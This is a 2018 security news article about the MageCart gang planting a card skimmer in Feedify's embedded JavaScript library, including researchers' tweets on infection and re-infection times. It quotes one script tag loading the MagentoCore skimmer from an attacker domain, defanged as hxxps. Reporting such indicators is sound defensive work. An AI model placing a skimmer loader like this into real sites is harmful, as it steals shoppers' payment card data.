Feedify cloud service architecture compromised by MageCart crime gang
17.9.2018 securityaffairs
CyberCrime

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.
MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service. The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

Yonathan Klijnsma

@ydklijnsma
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it.

Placebo
@Placebo52510486
Magecart on Feedify. A customer engagement tool. According to there website 4000+ website use there tooling/code. Fixed today after I notified them.@ydklijnsma @GossiTheDog

View image on TwitterView image on Twitter

10:05 PM - Sep 11, 2018
15
See Yonathan Klijnsma's other Tweets
Twitter Ads info and privacy
The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

View image on TwitterView image on TwitterView image on Twitter

Placebo
@Placebo52510486
Magecart on Feedify. A customer engagement tool. According to there website 4000+ website use there tooling/code. Fixed today after I notified them.@ydklijnsma @GossiTheDog

8:42 PM - Sep 11, 2018
32
29 people are talking about this
Twitter Ads info and privacy
but apparently, the hackers re-infected the library.

Yonathan Klijnsma

@ydklijnsma
FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT.

URL: hxxps://cdn[.]feedify[.]net/getjs/feedbackembad-min-1.0.js

/cc @Placebo52510486 @GossiTheDog @_feedify

Yonathan Klijnsma

@ydklijnsma
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it. https://twitter.com/Placebo52510486/status/1039585013057118209 …

5:22 PM - Sep 12, 2018
15
See Yonathan Klijnsma's other Tweets
Twitter Ads info and privacy
The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.